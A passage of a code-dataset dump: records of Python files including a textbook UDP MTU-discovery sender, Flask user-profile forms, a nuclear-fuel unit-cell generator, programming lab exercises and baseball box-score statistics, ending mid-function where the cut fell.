blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
2
616
content_id
stringlengths
40
40
detected_licenses
listlengths
0
69
license_type
stringclasses
2 values
repo_name
stringlengths
5
118
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringlengths
4
63
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
2.91k
686M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
23 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
220 values
src_encoding
stringclasses
30 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
2
10.3M
extension
stringclasses
257 values
content
stringlengths
2
10.3M
authors
listlengths
1
1
author_id
stringlengths
0
212
2152e4d7411322badcc18057abeadb63b01fcfe2
c44d2beeab0f42bc3a830be379ac74ab33b3fc50
/LAB4/UDP Programming/big_sender.py
fc3bce3cb26f3ca9b5359eb2fa8f7306e284332e
[]
no_license
moffeemoffee/cs-138-lab-exercises
b563a17efec6ccbdc34e571dece099be10b9a9cd
ea56215be39cc19ab6a53d4d937dc1adb8fd9de2
refs/heads/master
2020-04-13T03:45:03.717085
2018-12-24T02:29:24
2018-12-24T02:29:24
162,940,889
1
0
null
null
null
null
UTF-8
Python
false
false
1,266
py
#!/usr/bin/env python3 # Foundations for Python Network Programming, Third Edition # Send a big UDP datagram to learn the MTU of the network path. import argparse, socket, sys class IN: IP_MTU = 14 IP_MTU_DISCOVER = 10 IP_PMTUDISC_DO = 2 if sys.platform != 'linux': print('Unsupported: Can only perform MTU discovery on Linux', file=sys.stderr) sys.exit(1) def send_big_datagram(host, port): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.IPPROTO_IP, IN.IP_MTU_DISCOVER, IN.IP_PMTUDISC_DO) sock.connect((host, port)) try: sock.send(b'#' * 999999) except socket.error: print('Alas, the datagram did not make it') max_mtu = sock.getsockopt(socket.IPPROTO_IP, IN.IP_MTU) print('Actual MTU: {}'.format(max_mtu)) else: print('The big datagram was sent!') if __name__ == '__main__': parser = argparse.ArgumentParser(description='Send UDP packet to get MTU') parser.add_argument('host', help='the host to which to target the packet') parser.add_argument('-p', metavar='PORT', type=int, default=1060, help='UDP port (default 1060)') args = parser.parse_args() send_big_datagram(args.host, args.p)
[ "festbawi@gmail.com" ]
festbawi@gmail.com
42c10837c0d812cc3d3d37b0bf88b603173ac3eb
46a9e114d4cd67d6a7359be492885e6d722e9f9c
/neural_nets/RAM_V2/Predictor.py
4e1710be0f719f7436fb3a6cc11528d84f551680
[]
no_license
EvgnEvgn/diplom
44c7eed485a4f29416790326d65aae30cdcca909
aaf98d6efcf2c1c546f99d0c249f0a579b2d8d06
refs/heads/master
2020-09-16T09:35:22.021494
2020-08-03T11:28:40
2020-08-03T11:28:40
223,727,989
0
0
null
null
null
null
UTF-8
Python
false
false
3,101
py
import os import scipy.misc import numpy as np import tensorflow.compat.v1 as tf import matplotlib.pyplot as plt import matplotlib.patches as patches class Predictor(object): def __init__(self, model): self._model = model self._accuracy_op = model.get_accuracy() self._pred_op = model.layers['pred'] self._sample_loc_op = model.layers['loc_sample'] def evaluate(self, sess, dataflow, batch_size=None): self._model.set_is_training(False) step = 0 acc_sum = 0 while dataflow.epochs_completed == 0: step += 1 batch_data = dataflow.next_batch_dict() acc = sess.run( self._accuracy_op, feed_dict={self._model.image: batch_data['data'], self._model.label: batch_data['label'], }) acc_sum += acc print('accuracy: {:.4f}' .format(acc_sum * 1.0 / step)) self._model.set_is_training(True) def test_batch(self, sess, batch_data, unit_pixel, size, scale, save_path=''): def draw_bbx(ax, x, y): rect = patches.Rectangle( (x, y), cur_size, cur_size, edgecolor='r', facecolor='none', linewidth=2) ax.add_patch(rect) self._model.set_is_training(False) test_im = batch_data['data'] loc_list, pred, input_im, glimpses = sess.run( [self._sample_loc_op, self._pred_op, self._model.input_im, self._model.layers['retina_reprsent']], feed_dict={self._model.image: test_im, self._model.label: batch_data['label'], }) pad_r = size * (2 ** (scale - 2)) print(pad_r) im_size = input_im[0].shape[0] loc_list = np.clip(np.array(loc_list), -1.0, 1.0) loc_list = loc_list * 1.0 * unit_pixel / (im_size / 2 + pad_r) loc_list = (loc_list + 1.0) * 1.0 / 2 * (im_size + pad_r * 2) offset = pad_r print(pred) for step_id, cur_loc in enumerate(loc_list): im_id = 0 glimpse = glimpses[step_id] for im, loc, cur_glimpse in zip(input_im, cur_loc, glimpse): im_id += 1 fig, ax = plt.subplots(1) ax.imshow(np.squeeze(im), cmap='gray') for scale_id in range(0, scale): cur_size = size * 2 ** scale_id side = cur_size * 1.0 / 2 x = loc[1] - side - offset y = loc[0] - side - offset draw_bbx(ax, x, y) # plt.show() for i in range(0, scale): scipy.misc.imsave( os.path.join(save_path, 'im_{}_glimpse_{}_step_{}.png').format(im_id, i, step_id), np.squeeze(cur_glimpse[:, :, i])) plt.savefig(os.path.join( save_path, 'im_{}_step_{}.png').format(im_id, step_id)) plt.close(fig) self._model.set_is_training(True)
[ "sharipovevgn@gmail.com" ]
sharipovevgn@gmail.com
891071c010df3c7f66cf29a7b23281da0ff4a439
d1df1ea6dee606c15144f8f6a351aa39ccf885ea
/process.py
61f959a4d472218346b85fb514a2e990548a71ea
[]
no_license
liyumeng/HadoopPractice
2c4b43bc67602d89f0ed7ad38a0b5b0dd7ee2acb
338ddabc516c7e781b3d98ba993028693090abb1
refs/heads/master
2020-06-25T10:19:23.133155
2017-07-12T08:30:08
2017-07-12T08:30:08
96,974,849
0
0
null
null
null
null
UTF-8
Python
false
false
175
py
f=open('wiki.output') dst=open('cluster.vec','w') for i in range(5): items=f.readline().split(' ') items[0]=str(i+1) dst.write(' '.join(items)) dst.close() f.close()
[ "v-yumeli@microsoft.com" ]
v-yumeli@microsoft.com
3fe76dba2406707715ea71443aa5c68084b6427c
a97db7d2f2e6de010db9bb70e4f85b76637ccfe6
/leetcode/143-Reorder-List.py
76dc35a930512a20ad60fd1ba66c72c733a1b227
[]
no_license
dongxiaohe/Algorithm-DataStructure
34547ea0d474464676ffffadda26a92c50bff29f
a9881ac5b35642760ae78233973b1608686730d0
refs/heads/master
2020-05-24T20:53:45.689748
2019-07-19T03:46:35
2019-07-19T03:46:35
187,463,938
0
1
null
null
null
null
UTF-8
Python
false
false
792
py
class Solution: def reorderList(self, head): if not head or not head.next: return slow, fast = head, head while fast.next and fast.next.next: slow = slow.next fast = fast.next.next first, second = slow, slow.next while second.next: # 1->2->3->4->5->6 to 1->2->3->6->5->4 third = second.next second.next = third.next third.next = first.next first.next = third first, second, third = head, slow, slow.next while first != second: # 1->2->3->6->5->4 to 1->6->2->5->3->4 second.next = third.next first_1 = first.next first.next = third third.next = first_1 first = first_1 third = second.next
[ "ddong@zendesk.com" ]
ddong@zendesk.com
506c9e187e8a68aa4848d9d6899080b388210d83
ca82aece0685d2000133bc727feca59b75b169ec
/app/views/userprofile/forms.py
14a4938e304baf3e9d6ab7104f50b5c18709679a
[ "MIT" ]
permissive
BMeu/Aerarium
98ebfbb56d1aaa045721b168674411a8e2835a6c
119946cead727ef68b5ecea339990d982c006391
refs/heads/master
2022-12-14T20:34:52.924257
2021-04-30T04:18:38
2021-04-30T04:18:38
138,426,826
0
0
MIT
2022-12-08T07:43:17
2018-06-23T19:03:41
Python
UTF-8
Python
false
false
6,554
py
# -*- coding: utf-8 -*- """ Forms and form related functionality for the user profile. """ from typing import Any from typing import Optional from flask_babel import lazy_gettext as _l from flask_login import current_user from flask_wtf import FlaskForm from wtforms import BooleanField from wtforms import Field from wtforms import Form from wtforms import PasswordField from wtforms import SelectField from wtforms import StringField from wtforms import SubmitField from wtforms import ValidationError from wtforms.validators import DataRequired from wtforms.validators import Email as IsEmail from wtforms.validators import EqualTo from app.configuration import BaseConfiguration from app.localization import get_language_names from app.userprofile import User # region Validators class UniqueEmail(object): """ A WTForms validator to verify that an entered email address is not yet in use by a user other than the current one. """ def __init__(self, message: Optional[str] = None) -> None: """ :param message: The error message shown to the user if the validation fails. """ if not message: message = _l('The email address already is in use.') self.message = message def __call__(self, form: Form, field: Field) -> None: """ Execute the validator. :param form: The form to which the field belongs. :param field: The field to which this validator is attached. :raise ValidationError: In case the validation fails. """ email = field.data if not email: return # If there already is a user with that email address and this user is not the current user, this is an error. user = User.load_from_email(email) if user and user != current_user: raise ValidationError(self.message) # endregion # region Forms class DeleteUserProfileForm(FlaskForm): """ A form to request the deletion of a user's profile. The CSRF token is used so that a user cannot be tricked to delete their profile by redirecting them to the URL. """ submit = SubmitField(_l('Delete User Profile'), description=_l('Delete your user profile and all data linked to it.')) """ The submit button. """ class EmailForm(FlaskForm): """ A form requesting a user to enter their email address. """ email = StringField(_l('Email:'), validators=[DataRequired(), IsEmail()]) """ The field for the user's email address. """ submit = SubmitField(_l('Submit')) """ The submit button. """ class LoginForm(FlaskForm): """ A form allowing a user to log in. """ email = StringField(_l('Email:'), validators=[DataRequired(), IsEmail()]) """ The field for the user's email address. """ password = PasswordField(_l('Password:'), validators=[DataRequired()]) """ The field for the user's password. """ remember_me = BooleanField(_l('Remember Me')) """ A checkbox allowing the user to specify if they want to stay logged in across sessions. """ submit = SubmitField(_l('Log In')) """ The submit button. """ class LoginRefreshForm(FlaskForm): """ A form to refresh a stale login. """ password = PasswordField(_l('Password:'), validators=[DataRequired()]) """ The field for the user's password. """ submit = SubmitField(_l('Log In')) """ The submit button. """ class PasswordResetForm(FlaskForm): """ A form for resetting a user's password. """ password = PasswordField(_l('New Password:'), validators=[DataRequired()]) """ The field for the user's new password. """ password_confirmation = PasswordField(_l('Confirm Your New Password:'), validators=[DataRequired(), EqualTo('password')]) """ The field for confirming the new password. """ submit = SubmitField(_l('Change Password')) """ The submit button. """ class UserProfileForm(FlaskForm): """ A form allowing a user to change their profile. """ name = StringField(_l('Name:'), validators=[DataRequired()]) """ The field for the user's new name. """ email = StringField(_l('Email:'), validators=[DataRequired(), IsEmail(), UniqueEmail()], description=_l('We will send you an email to your new address with a link to confirm the \ changes. The email address will not be changed until you confirm this action.')) """ The field for the user's new email address. """ password = PasswordField(_l('New Password:'), description=_l('Leave this field empty if you do not want to change your password.')) """ The field for the user's new password. """ password_confirmation = PasswordField(_l('Confirm Your New Password:'), validators=[EqualTo('password')]) """ The field for confirming the user's new password. """ submit = SubmitField(_l('Save')) """ The submit button. """ class UserSettingsForm(FlaskForm): """ A form for changing a user's settings. """ language = SelectField(_l('Language:'), validators=[DataRequired()], description=_l('The language in which you want to use the application.')) """ The field for selecting the language in which the user wants to use the application. """ submit = SubmitField(_l('Save')) """ The submit button. """ def __init__(self, *args: Any, **kwargs: Any) -> None: """ :param args: The arguments for initializing the form. :param kwargs: The keyword argument for initializing the form. """ super().__init__(*args, **kwargs) self.language.choices = get_language_names(BaseConfiguration.TRANSLATION_DIR) class UserSettingsResetForm(FlaskForm): """ A form to reset the user's settings. The CSRF token is used so that a user cannot be tricked to reset their settings by redirecting them to the URL. """ submit = SubmitField(_l('Reset'), description=_l('Reset these settings to their default values.')) """ The submit button. """ # endregion
[ "bastian@bastianmeyer.eu" ]
bastian@bastianmeyer.eu
c8dfb5d9132e2ac7bee8e778528416727c9f1cc8
59232d1a9a411a906f366bcfec013824f1929b4f
/lab1/task-6.py
7ef4fd1d1381fd0a47ba2fd1ac0d07ba5e55886f
[]
no_license
KolyanPie/python-labs
71859eae1d2257e145e9cb5ad136446a8628f0aa
69109e970979f407ed612661d337cce73160dde7
refs/heads/master
2020-08-02T10:57:56.722604
2019-10-16T13:26:20
2019-10-16T13:26:20
211,326,436
0
0
null
null
null
null
UTF-8
Python
false
false
2,129
py
import time import math def task_1(): n = int(input('Введите кол-во секунд: ')) while n > -1: start_time = time.time() print('Осталось секунд:', n) n -= 1 try: time.sleep(1 - (start_time - time.time())) except ValueError: continue print('Пуск') def task_2(): n = int(input('Высота пирамиды: ')) for i in range(n): for j in range(n - i - 1): print(' ', end='') for j in range(2 * i + 1): print('*', end='') print() def task_3(): for i in range(17): if i % int(input()) == 0: print('ДА') else: print('НЕТ') def task_4(): n = int(input()) sum_iq = int(input()) print(0) for i in range(1, n): current = int(input()) sum_iq += current avg = sum_iq / (i + 1) if current > avg: print('>') elif current < avg: print('<') else: print(0) def lkd(a, b): while a > 0 and b > 0: if a > b: a = a % b else: b = b % a return a + b def task_5(): n = int(input()) nominator = int(input()) denominator = int(input()) for i in range(1, n): current_nominator = int(input()) current_denominator = int(input()) current_lkd = lkd(denominator, current_denominator) nominator = nominator * (denominator // current_lkd) + current_nominator * (current_denominator // current_lkd) denominator = denominator * current_denominator // current_lkd current_lkd = lkd(nominator, denominator) nominator //= current_lkd denominator //= current_lkd print(str(nominator) + '/' + str(denominator)) def task_6(): n = int(input()) sum_of_k = 0 for i in range(1, n + 1): sum_of_k += 1 / i ** 2 print(math.pi ** 2 / sum_of_k) def task_7(): n = int(input()) result = 0 for i in range(n): result += float(input()) * (1 - 2 * (i % 2)) print(result)
[ "43596340+KolyanPie@users.noreply.github.com" ]
43596340+KolyanPie@users.noreply.github.com
16bf080046bbb5795a3e2e0ec451f052d94d6c77
de38c7292bf1f27a4fbe787d9d7dae40b4de178c
/conditional.py
bd891ffd7a135244206103661dea5420426de876
[]
no_license
kyuing/python_syntax
cc10dd6c3a7248ff9a5b691494905711bcf0875c
c1d71c8c69d22bede863dfaae7308731a56556d6
refs/heads/master
2020-06-26T04:46:40.721407
2019-07-30T22:48:23
2019-07-30T22:48:23
199,533,065
0
0
null
null
null
null
UTF-8
Python
false
false
595
py
#input user_id = input('what is your id?') userInput = input('what is your password?') #if statement ''' if userInput == '111111': print("The user password is authorized") else: print("Try Again") if user_id == 'kyu': if userInput == '111111': print("The user is authorized") else: print("Invalid password") else: print("Invalid ID") ''' #Logical operator if user_id == 'kyu' and userInput == '111111': print("The user is authorized") elif user_id == 'rey' and userInput == '222222': print("The user is authorized") else: print("Invalid user")
[ "kyykyu000@gmail.com" ]
kyykyu000@gmail.com
3765a76c2e7c3127825dddf18f72246aac243fac
efd95aa667e4f5d38b853ab5af3369eff14d9a4c
/tests/test_unit_cell.py
6a9f36e2cdf8007a1ab17a247451ee76cc6046a7
[]
no_license
khurrumsaleem/FIG
dca401344a619626c53e0ef302ad376cbc0f907b
3abe717a4fe26e99a3b6f4a79fbff39dc7552af3
refs/heads/master
2023-03-15T18:05:31.625132
2018-08-01T15:54:49
2018-08-01T15:54:49
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,963
py
#!/usr/bin/python from FIG import triso from FIG import pbed from FIG import pb from FIG import mat from FIG.pb_gen import FuelPbGen from FIG.serp_concept import Cell, Universe, Surface from more_itertools import unique_everseen from util.mkdir import mkdir import config import shutil import numpy as np def create_a_fuel_pebble(fuel_temps, coating_temps, cgt, sht, pbname, burnup, pb_comp_dir, gen_dir_name): ''' create a fuel pebble, assuming all the triso particles in the pebble have the same temperature configurations(can have different temp in different triso layers though) fuel_temps: a list that contains temperature for each fuel layer in the triso, 1d array of length 1 or 3 coating_temps: a list that contains temp for each of the non-fuel layers in triso cgt: central graphite temperature sht: shell temperature burnup: used to choose the fuel mat composition file in pb_comp_dir ''' assert fuel_temps.shape == (1,) or fuel_temps.shape == (3,), 'wrong fuel temp shape:%r' %(fuel_temps.shape) assert coating_temps.shape == (1,) or coating_temps.shape == (5,), 'wrong coating temp shape:%r' %(fuel_temps.shape) # create fuel materials fuels = [] for i, temp in enumerate(fuel_temps): fuel_name = 'fuel%d%s' % (i+1, pbname) fuel_input = '%s/fuel_mat%d' % (pb_comp_dir, burnup) fuels.append(mat.Fuel(temp, fuel_name, fuel_input)) # create triso particle if coating_temps.shape == (1,): tr = triso.Triso(coating_temps, fuels, dr_config='homogenized', dir_name=gen_dir_name) else: tr = triso.Triso(coating_temps, fuels, dr_config=None, dir_name=gen_dir_name) return pb.FPb(tr, cgt, sht, dir_name=gen_dir_name) def create_a_pb_list(fuel_temps, coating_temps, cgt, sht, uc_name, burnups, pb_comp_dir, gen_dir_name): ''' fuel_temps: temperature list for unique pebbles in the unit cell a matrix of unique pebbles x n layers of fuel in a triso coating_temps: a list that contains temp for each of the non-fuel layers in triso, e.g. 4x5 cgt: central graphite temperature sht: shell temperature ''' fpb_list = [] unique_fpb_list = {} unique_burnups = list(unique_everseen(burnups)) unique_burnup_nb = len(unique_burnups) assert fuel_temps.shape[0] == unique_burnup_nb, 'wrong dimension %s' %str(fuel_temps.shape) assert coating_temps.shape[0] == unique_burnup_nb, 'wrong dimension' # create a list of unique pebbles for i, bu in enumerate(unique_burnups): pb_name = 'pb%s%d' % (uc_name, bu) unique_fpb_list[bu] = create_a_fuel_pebble(fuel_temps[bu-1, :], coating_temps[unique_burnups[i]-1, :], cgt, sht, pb_name, unique_burnups[i], pb_comp_dir, gen_dir_name) # create a list of all the 14 fuel pebbles, some of them are exactly the same for bu in burnups: fpb_list.append(unique_fpb_list[bu]) return fpb_list def create_the_unit_cell(fuel_temps, triso_temps, burnups, pb_comp_dir, gen_dir_name): ''' fuel_temps: a list of temperatures used to define fuel layers triso_temps: a list of temperatures used to define layers ''' pb_list = create_a_pb_list(fuel_temps, triso_temps, 900, 900, '', burnups, pb_comp_dir, gen_dir_name) from pbed import FuelUnitCell unit_cell = FuelUnitCell(pb_list, 900, packing_fraction=0.6, dir_name=gen_dir_name) mkdir(gen_dir_name) f = open(''.join([gen_dir_name, 'unit_cell']), 'w+') text = unit_cell.generate_output() f.write(text) f.close if __name__ == "__main__": pb_burnups = np.array([1, 1, 1, 1, 2, 2, 2, 2, 3, 4, 5, 6, 7, 8]) sample_nb = 20 fuel_nb = 3 coating_nb = 5 burnup_nb = len(list(unique_everseen(pb_burnups))) temps = np.ones((burnup_nb, 8))*900 # generating a set of input files for serpent # to generat cross sections for different temperatures # each of the 3 fuel layers in triso particles # each of the 4 or 8 burnups Cell.id = 1 Universe.id = 1 Surface.id = 1 FuelPbGen.wrote_surf = False tempsf = temps[:, 0:fuel_nb] tempst = temps[:, fuel_nb:fuel_nb+coating_nb] output_dir_name = 'res/' fuel_comp_folder = config.FLUX_ALL_AVE_FOLDER create_the_unit_cell(tempsf, tempst, pb_burnups, fuel_comp_folder, output_dir_name)
[ "imwangxin@gmail.com" ]
imwangxin@gmail.com
749b3658fc50ff9ff75cd1f23584da73f32d9a20
3d8f0fffbde79ee3b8cb6a2d157f7bfaadb21b87
/baseball/stats.py
430a528c35d7cb58295496aef235661123801a13
[ "MIT" ]
permissive
CBEAR-BASEBALL/baseball
93dd6c9e686f46ee116c04c2e170d83f0f54a460
4478375f49f19dc3537ac09955a25e5e5c97ac51
refs/heads/master
2020-03-13T17:27:29.328677
2018-04-12T19:40:59
2018-04-12T19:40:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
30,299
py
from collections import namedtuple from baseball.baseball_events import Pickoff, RunnerAdvance, Pitch NOT_AT_BAT_CODE_LIST = ['SB', 'SF', 'BB', 'CI', 'FI', 'IBB', 'HBP', 'CS', 'PO'] HIT_CODE_LIST = ['1B', '2B', '3B', 'HR'] InningStatsTuple = namedtuple('InningStatsTuple', 'S P BB K LOB E H R') BatterBoxScore = namedtuple('BatterBoxScore', 'AB R H RBI BB SO LOB') PitcherBoxScore = namedtuple( 'PitcherBoxScore', 'IP WLS BF H R ER SO BB IBB HBP BLK WP HR S P ERA WHIP' ) TeamBoxScore = namedtuple( 'TeamBoxScore', 'B1 B2 B3 HR SF SAC DP HBP WP PB SB CS PA' ) def process_pickoffs(plate_appearance, first_base, second_base, third_base): for event in plate_appearance.event_list: if (isinstance(event, Pickoff) and event.pickoff_was_successful): if event.pickoff_base == '1B': first_base = None elif event.pickoff_base == '2B': second_base = None elif event.pickoff_base == '3B': third_base = None elif (isinstance(event, RunnerAdvance) and 'Picked off stealing' in event.run_description): if event.start_base == '1B': first_base = None elif event.start_base == '2B': second_base = None elif event.start_base == '3B': third_base = None return first_base, second_base, third_base def process_baserunners(plate_appearance, last_plate_appearance, first_base, second_base, third_base): for event in plate_appearance.event_list: if isinstance(event, RunnerAdvance): if (plate_appearance == last_plate_appearance and 'out' in event.run_description): break else: if event.end_base == '1B': first_base = event.runner elif event.end_base == '2B': second_base = event.runner if (event.start_base == '1B' and first_base == event.runner): first_base = None elif event.end_base == '3B': third_base = event.runner if (event.start_base == '1B' and first_base == event.runner): first_base = None elif (event.start_base == '2B' and second_base == event.runner): second_base = None elif event.end_base == '': if (event.start_base == '1B' and first_base == event.runner): first_base = None elif (event.start_base == '2B' and second_base == event.runner): second_base = None elif (event.start_base == '3B' and third_base == event.runner): third_base = None return first_base, second_base, third_base def get_inning_half_list(game, inning_half_str): if inning_half_str == 'top': inning_half_list = [inning.top_half_appearance_list for inning in game.inning_list] elif inning_half_str == 'bottom': inning_half_list = [inning.bottom_half_appearance_list for inning in game.inning_list if inning.bottom_half_appearance_list] else: raise ValueError( 'Invalid inning half str: {}'.format(inning_half_str) ) return inning_half_list def get_half_inning_stats(top_half_appearance_list, bottom_half_appearance_list): if top_half_appearance_list: top_half_inning_stats = InningStatsTuple( get_strikes(top_half_appearance_list), get_pitches(top_half_appearance_list), get_walks(top_half_appearance_list), get_strikeouts(top_half_appearance_list), get_lob(top_half_appearance_list), get_errors(top_half_appearance_list), get_hits(top_half_appearance_list), get_runs(top_half_appearance_list) ) else: top_half_inning_stats = None if bottom_half_appearance_list: bottom_half_inning_stats = InningStatsTuple( get_strikes(bottom_half_appearance_list), get_pitches(bottom_half_appearance_list), get_walks(bottom_half_appearance_list), get_strikeouts(bottom_half_appearance_list), get_lob(bottom_half_appearance_list), get_errors(bottom_half_appearance_list), get_hits(bottom_half_appearance_list), get_runs(bottom_half_appearance_list) ) else: bottom_half_inning_stats = None return top_half_inning_stats, bottom_half_inning_stats def get_all_pitcher_stats(game, team, pitcher, inning_half_str): inning_half_list = get_inning_half_list(game, inning_half_str) pitcher_box_score = PitcherBoxScore( get_pitcher_innings_pitched(pitcher, inning_half_list), get_pitcher_win_loss_save(pitcher, team), get_pitcher_batters_faced(pitcher, inning_half_list), get_pitcher_hits(pitcher, inning_half_list), get_pitcher_runs(pitcher, inning_half_list), get_pitcher_earned_runs(pitcher, inning_half_list), get_pitcher_strikeouts(pitcher, inning_half_list), get_pitcher_nonintentional_walks(pitcher, inning_half_list), get_pitcher_intentional_walks(pitcher, inning_half_list), get_pitcher_hit_by_pitch(pitcher, inning_half_list), get_pitcher_balks(pitcher, inning_half_list), get_pitcher_wild_pitches(pitcher, inning_half_list), get_pitcher_home_runs(pitcher, inning_half_list), get_pitcher_strikes(pitcher, inning_half_list), get_pitcher_pitches(pitcher, inning_half_list), get_pitcher_era(pitcher, inning_half_list), get_pitcher_whip(pitcher, inning_half_list) ) return pitcher_box_score def get_all_batter_stats(game, batter, inning_half_str): inning_half_list = get_inning_half_list(game, inning_half_str) batter_box_score = BatterBoxScore( get_batter_at_bats(batter, inning_half_list), get_batter_runs(batter, inning_half_list), get_batter_hits(batter, inning_half_list), get_batter_runs_batted_in(batter, inning_half_list), get_batter_walks(batter, inning_half_list), get_batter_strikeouts(batter, inning_half_list), get_batter_lob(batter, inning_half_list) ) return batter_box_score def get_box_score_total(box_score_dict): total_ab = 0 total_r = 0 total_h = 0 total_rbi = 0 total_bb = 0 total_so = 0 total_lob = 0 for box_score in box_score_dict.values(): total_ab += box_score.AB total_r += box_score.R total_h += box_score.H total_rbi += box_score.RBI total_bb += box_score.BB total_so += box_score.SO total_lob += box_score.LOB box_score_total_tuple = BatterBoxScore(total_ab, total_r, total_h, total_rbi, total_bb, total_so, total_lob) return box_score_total_tuple def get_batter_strikeouts(batter, inning_half_list): num_strikeouts = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if batter == plate_appearance.batter: if ('K' in plate_appearance.scorecard_summary or 'ꓘ' in plate_appearance.scorecard_summary): num_strikeouts += 1 return num_strikeouts def get_batter_walks(batter, inning_half_list): num_walks = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if batter == plate_appearance.batter: if 'BB' in plate_appearance.scorecard_summary: num_walks += 1 return num_walks def get_batter_runs_batted_in(batter, inning_half_list): num_rbis = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if batter == plate_appearance.batter: num_rbis += len(plate_appearance.runners_batted_in_list) return num_rbis def plate_appearance_is_hit(plate_appearance): is_hit = False for code in HIT_CODE_LIST: if code in plate_appearance.scorecard_summary: is_hit = True return is_hit def get_batter_hits(batter, inning_half_list): num_hits = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if (batter == plate_appearance.batter and plate_appearance_is_hit(plate_appearance)): num_hits += 1 return num_hits def get_batter_runs(batter, inning_half_list): num_runs = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if batter in plate_appearance.scoring_runners_list: num_runs += 1 return num_runs def is_at_bat(plate_appearance): at_bat_flag = True if plate_appearance.plate_appearance_summary == 'Runner Out': at_bat_flag = False for code in NOT_AT_BAT_CODE_LIST: if plate_appearance.scorecard_summary.startswith(code): at_bat_flag = False return at_bat_flag def get_batter_at_bats(batter, inning_half_list): at_bats = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if (batter == plate_appearance.batter and is_at_bat(plate_appearance)): at_bats += 1 return at_bats def get_batter_lob(batter, inning_half_list): player_lob = 0 for inning_half in inning_half_list: first_base = None second_base = None third_base = None for plate_appearance in inning_half: (first_base, second_base, third_base) = process_pickoffs(plate_appearance, first_base, second_base, third_base) if (not plate_appearance_is_hit(plate_appearance) and 'BB' not in plate_appearance.scorecard_summary and 'HBP' not in plate_appearance.scorecard_summary): num_lob = 0 if first_base: num_lob += 1 if second_base: num_lob += 1 if third_base: num_lob += 1 num_lob -= len(plate_appearance.scoring_runners_list) if (batter == plate_appearance.batter and is_at_bat(plate_appearance)): player_lob += num_lob (first_base, second_base, third_base) = process_baserunners(plate_appearance, inning_half[-1], first_base, second_base, third_base) return player_lob def get_ip_incr(num_innings_pitched): if num_innings_pitched % 10 < 2: increment = 1 elif num_innings_pitched % 10 == 2: increment = 8 else: increment = 0 return increment def get_pitcher_innings_pitched(pitcher, inning_half_list): innings_pitched = 0 for inning_half in inning_half_list: num_outs = 0 for plate_appearance in inning_half: this_plate_appearance_outs = plate_appearance.inning_outs - num_outs num_outs += this_plate_appearance_outs if pitcher == plate_appearance.pitcher: for _ in range(this_plate_appearance_outs): innings_pitched += get_ip_incr(innings_pitched) return innings_pitched / 10 def get_pitcher_win_loss_save(pitcher, team): for pitcher_appearance in team.pitcher_list: if pitcher_appearance.player_obj == pitcher: return pitcher_appearance.pitcher_credit_code raise ValueError('Invalid pitcher') def get_pitcher_batters_faced(pitcher, inning_half_list): num_batters_faced = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if (pitcher == plate_appearance.pitcher and 'CS' not in plate_appearance.scorecard_summary and 'PO' not in plate_appearance.scorecard_summary): num_batters_faced += 1 return num_batters_faced def get_pitcher_hits(pitcher, inning_half_list): num_hits = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if (pitcher == plate_appearance.pitcher and plate_appearance_is_hit(plate_appearance)): num_hits += 1 return num_hits def get_pitcher_runs(pitcher, inning_half_list): num_runs = 0 for inning_half in inning_half_list: if inning_half: inning_start_pitcher = inning_half[0].pitcher pitcher_change_flag = False first_base, second_base, third_base = None, None, None for plate_appearance in inning_half: if (plate_appearance.pitcher != inning_start_pitcher and not pitcher_change_flag): pitcher_change_flag = True change_baserunner_count = sum( x is not None for x in [first_base, second_base, third_base] ) (first_base, second_base, third_base) = process_baserunners(plate_appearance, inning_half[-1], first_base, second_base, third_base) for event in plate_appearance.event_list: if (isinstance(event, RunnerAdvance) and event.runner_scored): if pitcher_change_flag and change_baserunner_count: change_baserunner_count -= 1 if (plate_appearance.pitcher != pitcher and inning_start_pitcher == pitcher): num_runs += 1 elif pitcher == plate_appearance.pitcher: num_runs += 1 return num_runs def get_pitcher_errors(pitcher, inning_half_list): num_errors = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: if pitcher == plate_appearance.pitcher: if plate_appearance.error_str == 'E1': num_errors += 1 last_description = None for event in plate_appearance.event_list: if isinstance(event, RunnerAdvance): if ('Pickoff Error' in event.run_description and last_description != event.run_description): num_errors += 1 last_description = event.run_description else: last_description = None return num_errors def get_pitcher_earned_runs(pitcher, inning_half_list): num_er = 0 for inning_half in inning_half_list: if inning_half: inning_start_pitcher = inning_half[0].pitcher pitcher_change_flag = False first_base, second_base, third_base = None, None, None for plate_appearance in inning_half: if (plate_appearance.pitcher != inning_start_pitcher and not pitcher_change_flag): pitcher_change_flag = True change_baserunner_count = sum( x is not None for x in [first_base, second_base, third_base] ) (first_base, second_base, third_base) = process_baserunners(plate_appearance, inning_half[-1], first_base, second_base, third_base) for event in plate_appearance.event_list: if (isinstance(event, RunnerAdvance) and event.runner_scored and event.run_earned): if pitcher_change_flag and change_baserunner_count: if (plate_appearance.pitcher != pitcher and inning_start_pitcher == pitcher): num_er += 1 change_baserunner_count -= 1 elif pitcher == plate_appearance.pitcher: num_er += 1 return num_er def get_pitcher_strikeouts(pitcher, inning_half_list): num_strikeouts = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: summary = plate_appearance.plate_appearance_summary if (pitcher == plate_appearance.pitcher and 'Strikeout' in summary): num_strikeouts += 1 return num_strikeouts def get_pitcher_nonintentional_walks(pitcher, inning_half_list): num_walks = 0 for inning_half in inning_half_list: for plate_appearance in inning_half: summary = plate_appearance.plate_appearance_summary if pitcher == plate_appearance.pitcher and summary == 'Walk': num_walks += 1 return num_walks def get_pitcher_intentional_walks(pitcher, inning_half_list): num_intent_walks = 0 for inning_half in 